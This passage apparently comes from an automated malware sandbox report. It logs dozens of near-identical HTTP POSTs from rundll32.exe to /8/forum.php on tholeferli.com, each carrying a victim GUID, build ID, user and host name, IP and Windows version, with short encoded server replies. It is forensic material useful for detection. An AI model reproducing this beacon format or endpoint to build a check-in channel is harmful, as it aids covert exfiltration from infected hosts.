                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:00.946420908 CEST422INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:00 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 46 4a 51 55 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cFJQUARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                114192.168.2.2249281194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:01.224749088 CEST423OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:01.392529964 CEST423INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:01 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 47 54 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQGTJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                115192.168.2.2249282194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:01.675998926 CEST424OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:01.863708019 CEST424INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:01 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 59 43 58 42 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cYCXBARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                116192.168.2.2249283194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:02.156478882 CEST425OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:02.312468052 CEST425INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:02 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                117192.168.2.2249284194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:02.584587097 CEST426OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:02.740611076 CEST426INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:02 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKYBPARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                118192.168.2.2249285194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:03.016128063 CEST427OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:03.171837091 CEST428INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:03 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 4b 50 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cNKPMARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                119192.168.2.2249286194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:03.467390060 CEST429OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:03.625241041 CEST429INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:03 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 42 4a 51 59 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cBJQYARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                12192.168.2.2249179194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:11:08.277009010 CEST308OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:11:08.445487022 CEST309INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:11:08 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 43 58 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTCXGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                120192.168.2.2249287194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:03.907593966 CEST430OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:04.076158047 CEST430INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:03 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 4e 4d 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGNMTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                121192.168.2.2249288194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:04.350253105 CEST431OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:04.520309925 CEST431INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:04 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 47 4d 4e 54 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cGMNTARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                122192.168.2.2249289194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:04.812446117 CEST432OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:04.979065895 CEST432INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:04 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 51 56 45 4a 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cQVEJARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                123192.168.2.2249290194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:05.250222921 CEST433OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:05.405751944 CEST433INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:05 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4a 4e 4d 51 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cJNMQARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                124192.168.2.2249291194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:05.685089111 CEST434OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:05.841520071 CEST434INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:05 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 5a 41 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZZAAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                125192.168.2.2249292194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:06.127482891 CEST435OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:06.294018030 CEST436INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:06 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 5a 46 55 41 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cZFUAARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                126192.168.2.2249293194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:06.582639933 CEST436OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:06.749896049 CEST437INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:06 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4d 59 42 4e 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cMYBNARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                127192.168.2.2249294194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:07.026973963 CEST437OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:07.183212042 CEST438INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 54 5a 41 47 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cTZAGARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                128192.168.2.2249295194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:07.469902992 CEST439OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:07.627796888 CEST439INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4b 59 42 50 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: cKYBPARRABw==0


                                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                                129192.168.2.2249296194.147.115.7480C:\Windows\SysWOW64\rundll32.exe
                                                TimestampkBytes transferredDirectionData
                                                Jul 22, 2021 16:12:07.902539015 CEST440OUTPOST /8/forum.php HTTP/1.1
                                                Accept: */*
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                Host: tholeferli.com
                                                Content-Length: 110
                                                Cache-Control: no-cache
                                                Data Raw: 47 55 49 44 3d 37 35 34 35 33 31 30 32 39 31 33 37 38 38 32 38 35 32 34 26 42 55 49 4c 44 3d 32 32 30 37 5f 78 77 70 69 36 37 26 49 4e 46 4f 3d 39 38 30 31 30 38 20 40 20 41 4c 42 55 53 2d 50 43 5c 41 6c 62 75 73 26 45 58 54 3d 26 49 50 3d 38 34 2e 31 37 2e 35 32 2e 38 26 54 59 50 45 3d 31 26 57 49 4e 3d 36 2e 31 28 78 36 34 29
                                                Data Ascii: GUID=7545310291378828524&BUILD=2207_xwpi67&INFO=980108 @ user-PC\user&EXT=&IP=84.17.52.8&TYPE=1&WIN=6.1(x64)
                                                Jul 22, 2021 16:12:08.058758974 CEST440INHTTP/1.1 200 OK
                                                Server: nginx/1.20.1
                                                Date: Thu, 22 Jul 2021 14:12:07 GMT
                                                Content-Type: text/html
                                                Transfer-Encoding: chunked
                                                Connection: keep-alive
                                                X-Powered-By: PHP/5.4.45
                                                Data Raw: 63 0d 0a 4e 47 54 4d 41 52 52 41 42 77 3d 3d 0d 0a 30 0d 0a 0d 0a
